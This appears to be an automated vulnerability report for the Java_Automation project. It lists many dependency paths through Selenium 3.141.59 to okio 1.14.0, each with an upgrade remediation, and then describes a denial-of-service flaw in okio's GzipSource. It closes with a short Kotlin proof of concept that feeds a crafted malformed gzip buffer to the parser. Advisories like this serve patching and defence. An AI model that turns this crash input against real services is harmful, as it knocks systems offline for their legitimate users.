Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-firefox-driver@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@3.55.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@3.55.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:htmlunit-driver@2.44.0 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:htmlunit-driver@3.55.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

Remediation: Upgrade to org.seleniumhq.selenium:selenium-java@4.0.0.
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-support@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-firefox-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-chrome-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-edge-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-ie-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-opera-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0
Introduced through: benweese/Java_Automation@benweese/Java_Automation#d8d275138a831ecbd0826bf71d767625f623fef6 › org.seleniumhq.selenium:selenium-server@3.141.59 › org.seleniumhq.selenium:selenium-java@3.141.59 › org.seleniumhq.selenium:selenium-safari-driver@3.141.59 › org.seleniumhq.selenium:selenium-remote-driver@3.141.59 › com.squareup.okhttp3:okhttp@3.11.0 › com.squareup.okio:okio@1.14.0

…and 101 more

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS) due to improper exception handling by the GzipSource class when parsing a malformed gzip buffer.

This vulnerability can be exploited on the Okio client when handling a crafted GZIP archive.

PoC

val gzBuf: Buffer = Buffer()
    try {
        val gzByteString: ByteString = ("1f8b41ff424242424343ffff").decodeHex()
        gzBuf.write(gzByteString)
        val gz: GzipSource = GzipSource(gzBuf)
        val sinkBuf: Buffer = Buffer()
        gz.read(sinkBuf, 5)
    }
    catch(e: IOException) {
        println("got error: " + e.toString())
    }

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

